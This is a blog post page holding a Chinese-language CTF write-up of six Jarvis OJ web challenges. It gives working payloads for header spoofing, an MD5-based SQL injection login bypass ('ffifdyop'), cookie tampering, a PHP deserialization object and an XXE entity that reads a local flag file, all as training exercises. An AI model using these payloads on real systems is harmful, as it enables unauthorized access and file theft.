<!DOCTYPE html>



  


<html class="theme-next pisces use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="CTF practice," />










<meta name="description" content="[TOC] Localhost# 题目提示要用localhost去访问，以下给出两个方法 解法一·：利用burpsuite修改请求报文#利用burpsuite监听浏览器，在请求报文中添加： 1X-FORWARDED-FOR:127.0.0.1  即可以127.0.0.1的IP地址访问网页，获得Flag   学习：# 解法二：利用Firefox浏览器X-Forwarded-For-Header插件伪">
<meta property="og:type" content="article">
<meta property="og:title" content="Jarvios OJ Web WriteUp(一)">
<meta property="og:url" content="http://yoursite.com/2020/07/26/Jarvios-OJ-Web-WriteUp-%E4%B8%80/index.html">
<meta property="og:site_name" content="Cici&#39;s Blog">
<meta property="og:description" content="[TOC] Localhost# 题目提示要用localhost去访问，以下给出两个方法 解法一·：利用burpsuite修改请求报文#利用burpsuite监听浏览器，在请求报文中添加： 1X-FORWARDED-FOR:127.0.0.1  即可以127.0.0.1的IP地址访问网页，获得Flag   学习：# 解法二：利用Firefox浏览器X-Forwarded-For-Header插件伪">
<meta property="og:image" content="http://yoursite.com/2020/07/26/Jarvios-OJ-Web-WriteUp-%E4%B8%80/localhost1.png">
<meta property="og:image" content="http://yoursite.com/2020/07/26/Jarvios-OJ-Web-WriteUp-%E4%B8%80/localhost2.png">
<meta property="og:image" content="http://yoursite.com/2020/07/26/Jarvios-OJ-Web-WriteUp-%E4%B8%80/login1.png">
<meta property="og:image" content="http://yoursite.com/2020/07/26/Jarvios-OJ-Web-WriteUp-%E4%B8%80/admin1.png">
<meta property="og:image" content="http://yoursite.com/2020/07/26/Jarvios-OJ-Web-WriteUp-%E4%B8%80/port51.png">
<meta property="og:image" content="http://yoursite.com/2020/07/26/Jarvios-OJ-Web-WriteUp-%E4%B8%80/shield1.png">
<meta property="og:image" content="http://yoursite.com/2020/07/26/Jarvios-OJ-Web-WriteUp-%E4%B8%80/api1.png">
<meta property="og:image" content="http://yoursite.com/2020/07/26/Jarvios-OJ-Web-WriteUp-%E4%B8%80/api2.png">
<meta property="article:published_time" content="2020-07-25T18:10:04.000Z">
<meta property="article:modified_time" content="2020-07-25T18:12:43.736Z">
<meta property="article:author" content="Cici Gao">
<meta property="article:tag" content="CTF practice">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://yoursite.com/2020/07/26/Jarvios-OJ-Web-WriteUp-%E4%B8%80/localhost1.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2020/07/26/Jarvios-OJ-Web-WriteUp-一/"/>





  <title>Jarvios OJ Web WriteUp(一) | Cici's Blog</title>
  








<meta name="generator" content="Hexo 4.2.1"></head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Cici's Blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/%20" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/%20" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2020/07/26/Jarvios-OJ-Web-WriteUp-%E4%B8%80/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Cici Gao">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Cici's Blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">Jarvios OJ Web WriteUp(一)</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2020-07-26T02:10:04+08:00">
                2020-07-26
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>[TOC]</p>
<h2><span id="localhost">Localhost</span><a href="#localhost" class="header-anchor">#</a></h2><p><img src="/2020/07/26/Jarvios-OJ-Web-WriteUp-%E4%B8%80/localhost1.png" alt></p>
<p>题目提示要用localhost去访问，以下给出两个方法</p>
<h4><span id="jie-fa-yi-li-yong-burpsuite-xiu-gai-qing-qiu-bao-wen">解法一·：利用burpsuite修改请求报文</span><a href="#jie-fa-yi-li-yong-burpsuite-xiu-gai-qing-qiu-bao-wen" class="header-anchor">#</a></h4><p>利用burpsuite监听浏览器，在请求报文中添加：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">X-FORWARDED-FOR:127.0.0.1</span><br></pre></td></tr></table></figure>

<p>即可以127.0.0.1的IP地址访问网页，获得Flag</p>
<p><img src="/2020/07/26/Jarvios-OJ-Web-WriteUp-%E4%B8%80/localhost2.png" alt></p>
<blockquote>
<h6><span id="xue-xi-https-portswigger-net-support-configuring-firefox-to-work-with-burp">学习：</span><a href="#xue-xi-https-portswigger-net-support-configuring-firefox-to-work-with-burp" class="header-anchor">#</a></h6></blockquote>
<h4><span id="jie-fa-er-li-yong-firefox-liu-lan-qi-x-forwarded-for-header-cha-jian-wei-zao-ip-di-zhi">解法二：利用Firefox浏览器X-Forwarded-For-Header插件伪造IP地址</span><a href="#jie-fa-er-li-yong-firefox-liu-lan-qi-x-forwarded-for-header-cha-jian-wei-zao-ip-di-zhi" class="header-anchor">#</a></h4><blockquote>
<h6><span id="xue-xi-https-blog-csdn-net-fllowone-article-details-85038207">学习：</span><a href="#xue-xi-https-blog-csdn-net-fllowone-article-details-85038207" class="header-anchor">#</a></h6></blockquote>
<h2><span id="login">Login</span><a href="#login" class="header-anchor">#</a></h2><h4><span id="jie-fa-sql-zhu-ru">解法：SQL注入</span><a href="#jie-fa-sql-zhu-ru" class="header-anchor">#</a></h4><p>先抓包，在response报文中获得hint，有关SQL注入。其中唯一可以注入的地方就是md5函数。</p>
<p><img src="/2020/07/26/Jarvios-OJ-Web-WriteUp-%E4%B8%80/login1.png" alt></p>
<p>其中唯一可以注入的地方就是md5函数。既要让“passward=”后面的部分为true。</p>
<p>可以利用字符串“ffifdyop”经过md5加密后可得or‘6xxxxx’形式。字符串在SQL查询中，做布尔运算时，都被认为成一个整型数。只要开头是数字开头都被认为成true。</p>
<blockquote>
<p>字符串“ffifdyop”可以作为通用的sql注入方式</p>
</blockquote>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">输入内容：ffifdyop</span><br><span class="line">报文内容：%27or%276%5Cxc9%5D%5Cx99%5Cxe9%21r%2C%5Cxf9%5Cxedb%5Cx1c</span><br><span class="line">字符串：string: &#39;or&#39;6]!r,b</span><br></pre></td></tr></table></figure>

<blockquote>
<h6><span id="xue-xi-https-www-w3school-com-cn-php-func-string-md5-asp">学习：</span><a href="#xue-xi-https-www-w3school-com-cn-php-func-string-md5-asp" class="header-anchor">#</a></h6></blockquote>
<h2><span id="admin">Admin</span><a href="#admin" class="header-anchor">#</a></h2><h4><span id="jie-fa-robots-txt-cookie-qi-pian">解法：robots.txt+cookie欺骗</span><a href="#jie-fa-robots-txt-cookie-qi-pian" class="header-anchor">#</a></h4><p>打开界面就是Hello World，没有任何输入窗口。抓包后发现有：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">admin = <span class="number">0</span></span><br></pre></td></tr></table></figure>

<p>改为1后并没有什么收获，一脸懵逼；</p>
<p>输入index.php后没有收获，学习后得知，robots.txt是搜索引擎中访问网站的时候要查看的第一个文件；</p>
<p>输入robots.txt就可以查看不想被机器人访问的内容，果然发现了disallow部分</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Disallow: /admin_s3cr3t.php</span><br></pre></td></tr></table></figure>

<p>查看获得flag，但发现是个假flag。结合题目的名称考虑，抓包发现在cookie中有admin=0字样，改为1登陆到admin界面，获得真flag。</p>
<blockquote>
<p>在类似问题中，对于没有什么表面漏洞的网页，可以输入：index.php、flag.php、_ctf.php、robots.txt等</p>
</blockquote>
<p><img src="/2020/07/26/Jarvios-OJ-Web-WriteUp-%E4%B8%80/admin1.png" alt></p>
<blockquote>
<h6><span id="xue-xi-https-blog-csdn-net-wyj-1216-article-details-82949222">学习：</span><a href="#xue-xi-https-blog-csdn-net-wyj-1216-article-details-82949222" class="header-anchor">#</a></h6><h6><span id="https-blog-51cto-com-3757646-1401594"></span><a href="#https-blog-51cto-com-3757646-1401594" class="header-anchor">#</a></h6></blockquote>
<h2><span id="port51">Port51</span><a href="#port51" class="header-anchor">#</a></h2><h4><span id="jie-fa-curl-te-ding-duan-kou">解法：curl特定端口</span><a href="#jie-fa-curl-te-ding-duan-kou" class="header-anchor">#</a></h4><p>进入页面就看到提示：要用51端口来访问网页获取flag；使用curl指令来发送请求报文，并指定port</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">curl --local-port 0051 http:&#x2F;&#x2F;web.jarvisoj.com:32770&#x2F;</span><br></pre></td></tr></table></figure>

<p>但在本机和虚拟机的终端操作都没有成功，尝试修改本机的端口地址也没能获得flag，最后在阿里云服务器上成功获得了flag</p>
<p><img src="/2020/07/26/Jarvios-OJ-Web-WriteUp-%E4%B8%80/port51.png" alt></p>
<blockquote>
<p>原因：用本机去访问的时候，默认用的端口不是51；用虚拟机去访问的时候，流量也要经过主机的，端口也不是51；如果用服务器vps的话就没这个问题。</p>
</blockquote>
<blockquote>
<h6><span id="xue-xi-https-blog-csdn-net-qq-31481187-article-details-60968595">学习：</span><a href="#xue-xi-https-blog-csdn-net-qq-31481187-article-details-60968595" class="header-anchor">#</a></h6></blockquote>
<blockquote>
<h6><span id="https-blog-csdn-net-weixin-44077544-article-details-89407287"></span><a href="#https-blog-csdn-net-weixin-44077544-article-details-89407287" class="header-anchor">#</a></h6></blockquote>
<h2><span id="shen-dun-ju-de-mi-mi">神盾局的秘密</span><a href="#shen-dun-ju-de-mi-mi" class="header-anchor">#</a></h2><h4><span id="jie-fa-fan-xu-lie-hua-base64-jia-jie-mi">解法：反序列化+base64加解密</span><a href="#jie-fa-fan-xu-lie-hua-base64-jia-jie-mi" class="header-anchor">#</a></h4><p>打开后是一张图片，进行抓包尝试，在response中发现源码，img后的内容经过了base64加密</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">解密前：&#x2F;showimg.php?img&#x3D;c2hpZWxkLmpwZw&#x3D;&#x3D; </span><br><span class="line">解密后：shield.jpg</span><br></pre></td></tr></table></figure>

<blockquote>
<p>view-source查看源码</p>
</blockquote>
<p>将index.php经加密后替换获得源码和hint</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">加密前：index.php</span><br><span class="line">加密后：aW5kZXgucGhw</span><br><span class="line">hint：require_once(&#39;shield.php&#39;)</span><br><span class="line">加密前：shield.php</span><br><span class="line">加密后：c2hpZWxkLnBocA&#x3D;&#x3D;</span><br></pre></td></tr></table></figure>

<p>同理打开shield.php的源码；发现一行注释</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#x2F;&#x2F;flag is in pctf.php  &#x2F;&#x2F;提示flag在pctf.php中</span><br></pre></td></tr></table></figure>

<p>阅读代码，发现需要构造一个shield类，里面的filename参数为所需的pctf.php；在源码后加入如下代码输出构造出的类</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">$new &#x3D; new Shield(&#39;pctf.php&#39;);</span><br><span class="line">echo serialize($new);</span><br><span class="line">&#x2F;&#x2F;输出</span><br><span class="line">O:6:&quot;Shield&quot;:1:&#123;s:4:&quot;file&quot;;s:8:&quot;pctf.php&quot;;&#125;</span><br></pre></td></tr></table></figure>

<p>在网址后添加如下代码即可获得flag，注意要查看源码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">index.php?class&#x3D;O:6:&quot;Shield&quot;:1:&#123;s:4:&quot;file&quot;;s:8:&quot;pctf.php&quot;;&#125;</span><br></pre></td></tr></table></figure>

<p><img src="/2020/07/26/Jarvios-OJ-Web-WriteUp-%E4%B8%80/shield1.png" alt></p>
<blockquote>
<p>学习：<a href="https://blog.csdn.net/weixin_44077544/article/details/89407129" target="_blank" rel="noopener">https://blog.csdn.net/weixin_44077544/article/details/89407129</a></p>
</blockquote>
<h2><span id="api-diao-yong">api调用</span><a href="#api-diao-yong" class="header-anchor">#</a></h2><h4><span id="jie-fa-xxe-gong-ji">解法：XXE攻击</span><a href="#jie-fa-xxe-gong-ji" class="header-anchor">#</a></h4><p>根据提示flag在/home/ctf/flag.txt文件中，需要调用文件来获取flag</p>
<p>先随意输入内容进行抓包，发现发送报文是以json文件的形式发送的</p>
<p><img src="/2020/07/26/Jarvios-OJ-Web-WriteUp-%E4%B8%80/api1.png" alt></p>
<p>根据hint，flag在文件中，考虑用xxe攻击调用内部文件。<br>先将报文类型改为xml，再将报文内容进行如下修改，发送即获得flag</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&lt;?xml version&#x3D;&quot;1.0&quot;?&gt;</span><br><span class="line">&lt;!DOCTYPE a[</span><br><span class="line">&lt;!ENTITY b SYSTEM &quot;&#x2F;home&#x2F;ctf&#x2F;flag.txt&quot;&gt;</span><br><span class="line">]&gt;</span><br><span class="line">&lt;a&gt;&amp;b;&lt;&#x2F;a&gt;</span><br></pre></td></tr></table></figure>

<p><img src="/2020/07/26/Jarvios-OJ-Web-WriteUp-%E4%B8%80/api2.png" alt></p>
<blockquote>
<p>学习：<a href="https://blog.csdn.net/qq_41079177/article/details/100714546" target="_blank" rel="noopener">https://blog.csdn.net/qq_41079177/article/details/100714546</a></p>
</blockquote>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/CTF-practice/" rel="tag"># CTF practice</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2020/07/19/hello-world/" rel="next" title="Hello World">
                <i class="fa fa-chevron-left"></i> Hello World
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">Cici Gao</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/%20%7C%7C%20archive">
              
                  <span class="site-state-item-count">2</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                
                  <span class="site-state-item-count">1</span>
                  <span class="site-state-item-name">标签</span>
                
              </div>
            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#"><span class="nav-number">1.</span> <span class="nav-text">Localhost</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#"><span class="nav-number">1.0.1.</span> <span class="nav-text">解法一·：利用burpsuite修改请求报文</span></a><ol class="nav-child"><li class="nav-item nav-level-6"><a class="nav-link" href="#"><span class="nav-number">1.0.1.0.1.</span> <span class="nav-text">学习：</span></a></li></ol></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#"><span class="nav-number">1.0.2.</span> <span class="nav-text">解法二：利用Firefox浏览器X-Forwarded-For-Header插件伪造IP地址</span></a><ol class="nav-child"><li class="nav-item nav-level-6"><a class="nav-link" href="#"><span class="nav-number">1.0.2.0.1.</span> <span class="nav-text">学习：</span></a></li></ol></li></ol></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#"><span class="nav-number">2.</span> <span class="nav-text">Login</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#"><span class="nav-number">2.0.1.</span> <span class="nav-text">解法：SQL注入</span></a><ol class="nav-child"><li class="nav-item nav-level-6"><a class="nav-link" href="#"><span class="nav-number">2.0.1.0.1.</span> <span class="nav-text">学习：</span></a></li></ol></li></ol></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#"><span class="nav-number">3.</span> <span class="nav-text">Admin</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#"><span class="nav-number">3.0.1.</span> <span class="nav-text">解法：robots.txt+cookie欺骗</span></a><ol class="nav-child"><li class="nav-item nav-level-6"><a class="nav-link" href="#"><span class="nav-number">3.0.1.0.1.</span> <span class="nav-text">学习：</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#"><span class="nav-number">3.0.1.0.2.</span> <span class="nav-text">#</span></a></li></ol></li></ol></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#"><span class="nav-number">4.</span> <span class="nav-text">Port51</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#"><span class="nav-number">4.0.1.</span> <span class="nav-text">解法：curl特定端口</span></a><ol class="nav-child"><li class="nav-item nav-level-6"><a class="nav-link" href="#"><span class="nav-number">4.0.1.0.1.</span> <span class="nav-text">学习：</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#"><span class="nav-number">4.0.1.0.2.</span> <span class="nav-text">#</span></a></li></ol></li></ol></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#"><span class="nav-number">5.</span> <span class="nav-text">神盾局的秘密</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#"><span class="nav-number">5.0.1.</span> <span class="nav-text">解法：反序列化+base64加解密</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#"><span class="nav-number">6.</span> <span class="nav-text">api调用</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#"><span class="nav-number">6.0.1.</span> <span class="nav-text">解法：XXE攻击</span></a></li></ol></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Cici Gao</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Pisces</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
